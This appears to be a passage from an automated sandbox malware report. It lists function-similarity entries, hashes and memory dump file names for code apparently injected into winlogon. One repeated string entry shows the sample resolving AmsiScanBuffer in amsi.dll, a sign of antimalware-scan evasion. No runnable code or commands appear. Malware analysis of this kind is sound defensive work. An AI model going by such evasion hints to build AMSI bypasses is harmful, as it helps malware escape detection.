                                                  • Instruction ID: a75b9edf9b8994863e05616ee0606fecf03f18b00d3583885107efc661ca5ccb
                                                  • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction Fuzzy Hash: 0DF0A43375478892F7218B20F484B9A7360FB84B9CFC4C025DA4946554DE7EC74AC7D6
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction ID: 5131f7decd79886618750e5d372dbf6a6da6afe116d4c20a90690d0bf9f1d3e7
                                                  • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction Fuzzy Hash: 69F0AF73B5878892FB218B24F8D4B997371FB44B8CFC44021CA4942958DE6EC788CB52
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction ID: c70e5ec6ea267bb5cb580a1a018e7bc41a37316a57f8b87e098493fbd84ad30a
                                                  • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction Fuzzy Hash: E6F0683265470941FA114B24D884B9B7720FF89759FD402199E69491E4CF2EC44AC6C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CombinePath
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3422762182-91387939
                                                  • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction ID: a6a4aab0aeac4f6197f237278a9c0a3b7006fc945381a0c775642f0a2f533f1f
                                                  • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction Fuzzy Hash: 4FF05E76B44B8881FA058B13B91459BB260FFC8FC9F848430EE0A0BB18DE69C44687C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction ID: 70c250347f594e71b17261cfaf8131f5a1330f05be77572a744952222a5b5b64
                                                  • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction Fuzzy Hash: 6FF06273A4470941FA118B24E845BA93730FF49769FD54219AA6A451E4CF2EC44AC6CB
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CombinePath
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3422762182-91387939
                                                  • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction ID: 127a490b207412094bdf773d7bc7f314ed27483ed9a8622cdd057b0091c70391
                                                  • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction Fuzzy Hash: C8F0BE72B44B8881FA058B13B8045A97221BF48FC8FC5D430FE0A07B28CE39D54383C6
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction ID: c75c0d1d0a7dfc333aa3dd880c92edac9d32d090e86cc0fd6d0cdfce16583c4f
                                                  • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction Fuzzy Hash: 91F09673A4270981FB118B14D854B997720FF45769FD40319DA69451E8CF2EC548C383
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CombinePath
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3422762182-91387939
                                                  • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction ID: c82dd5a25fec972a5fbc4a73daeaf237b653ae254e79d6f593719484f7f8d2f0
                                                  • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction Fuzzy Hash: 90F08276F45B9881FA058B17F9245997661BF48FC9FC88430EE4A07B58CF2DC5458783
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProcSleep
                                                  • String ID: AmsiScanBuffer$amsi.dll
                                                  • API String ID: 188063004-3248079830
                                                  • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction ID: 2907fe888d2c04c09e7fe008df7f310d9433daeb94394008bd5d98f7c7cdab68
                                                  • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction Fuzzy Hash: B4D04C36E91708A5F90B6B11D854BA73262FFD4B49FC40415890A193649E2EC55A93D3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProcSleep
                                                  • String ID: AmsiScanBuffer$amsi.dll
                                                  • API String ID: 188063004-3248079830
                                                  • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction ID: 7246112f9244b4226b796b0cd794045831b2067abd02715776a67b51b8a182b6
                                                  • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction Fuzzy Hash: 2ED0EC32E9170881F90B6B00DC54B9432217F94B18FC18018950A012649E3ED54A93DB
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction ID: 99275fefa3e122d711dffe7bf7ab3ffa9f0cd8fb82334eb92c6249ce1198314e
                                                  • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction Fuzzy Hash: C1021A33659B8886E761CB15F49079AB7A0F7C4788F500015EACE97BA8DF7DC485CB82
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction ID: aa8ac499eb692d5db1208b44326d97ecb6e913e81b2b611b9ce91f482cf527ce
                                                  • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction Fuzzy Hash: 5302FD33658B8486E761CB19F49079AB7B0F7C4798F504019EA8E47BA8DF7EC445CB82
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction ID: 6a2463f9efe1ef2445148160494f6b45801955cb1664d84a517ab5a6c6691788
                                                  • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction Fuzzy Hash: DD51AF37B5470987F326CB16A440EAA73A1FF88B89FD140199D5A53B54DB3AC8068BD3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction ID: f376f59fa2a11924f07aeae0f4e24fca5b39dbef64f999cd2058c410ead475d3
                                                  • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction Fuzzy Hash: 04518F37B4470987F366CB15E441E9AB3A4FF88B58F908119AD5A43794DB3BD8068BC3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction ID: 3378145a71404300d070cab9fed9048c8f8061d59c9752aa83fb82bf50c4289a
                                                  • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction Fuzzy Hash: 8851A133A547098AF326CF16A450EAA73A5FF88B89FD10018DD4A13754DB7AC8078BC3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction ID: 9e5fd35e134bb6201940a3d8bb8db161ac21b1b241632d42dbc14525f9094f05
                                                  • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction Fuzzy Hash: 7E518233B54705CBF726CF15A440A9A73A4FF84B88F808119AE4A43754DB3AD906C7C3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction ID: 8dc7a5a5a748a40cbc29a5a267432368ed8bc244d7968494e66c256cbaf93485
                                                  • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction Fuzzy Hash: 2C519333B547098BF726CF15E850E9973A0FB88B89F804159DD4A43754EB3AC945CB83
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction ID: ea16a1a7a1a17f6f263131a3a1cfce36d3cacf334bdce0e67c9e7c118ef6d97e
                                                  • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction Fuzzy Hash: 70610C33A58B4886F762CB15E540B5AB7E0F789789F900115EACD53BA8DB7AC441CF82
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction ID: 613c8c001a099c7bb1652f2b5ad2a82541488477a47cebf72ef6da64e55ba237
                                                  • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction Fuzzy Hash: 1B61DA33968B48C6F761CF19E440B5AB7A5F788748F904119EA8D43BA8DB7AC541CB82
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: f37e1c6386c44249f93e7a8c8070b12ec0e492f56422c91e1d25021c4f6724ae
                                                  • Instruction ID: fa9a5d2907fee9bc4b961baced023eb20950943a2e523218285e0907ba0ddb00
                                                  • Opcode Fuzzy Hash: f37e1c6386c44249f93e7a8c8070b12ec0e492f56422c91e1d25021c4f6724ae
                                                  • Instruction Fuzzy Hash: 1F61F633969B4886F761CB15E550B9AB7E0FB88749F900115FA8D43BA8DB3EC540CB83
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
